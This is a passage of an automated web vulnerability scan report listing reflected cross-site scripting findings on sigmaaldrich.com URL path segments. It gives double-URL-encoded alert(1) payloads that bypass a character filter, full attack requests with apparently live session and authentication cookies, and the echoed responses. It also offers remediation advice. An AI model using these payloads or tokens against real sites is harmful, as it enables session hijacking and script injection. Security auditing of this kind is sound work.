Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-researchf3d39";alert(1)//baba3e27b12","E404") ;
   </script>
...[SNIP]...

1.158. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a94c%2522%253balert%25281%2529%252f%252f3c92b03dd5a was submitted in the REST URL parameter 1. This input was echoed as 7a94c";alert(1)//3c92b03dd5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content7a94c%2522%253balert%25281%2529%252f%252f3c92b03dd5a/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content7a94c";alert(1)//3c92b03dd5a/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.159. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e07e%2522%253balert%25281%2529%252f%252fde125272a10 was submitted in the REST URL parameter 2. This input was echoed as 3e07e";alert(1)//de125272a10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich3e07e%2522%253balert%25281%2529%252f%252fde125272a10/customer-support/customer-service/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich3e07e";alert(1)//de125272a10/customer-support/customer-service/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.160. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a4ac%2522%253balert%25281%2529%252f%252f7176143ea14 was submitted in the REST URL parameter 3. This input was echoed as 1a4ac";alert(1)//7176143ea14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support1a4ac%2522%253balert%25281%2529%252f%252f7176143ea14/customer-service/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support1a4ac";alert(1)//7176143ea14/customer-service/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.161. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7138a%2522%253balert%25281%2529%252f%252f2eed1d2cbaf was submitted in the REST URL parameter 4. This input was echoed as 7138a";alert(1)//2eed1d2cbaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service7138a%2522%253balert%25281%2529%252f%252f2eed1d2cbaf/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service7138a";alert(1)//2eed1d2cbaf/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.162. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc3c9%2522%253balert%25281%2529%252f%252f3022a9f9e58 was submitted in the REST URL parameter 5. This input was echoed as cc3c9";alert(1)//3022a9f9e58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicescc3c9%2522%253balert%25281%2529%252f%252f3022a9f9e58/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
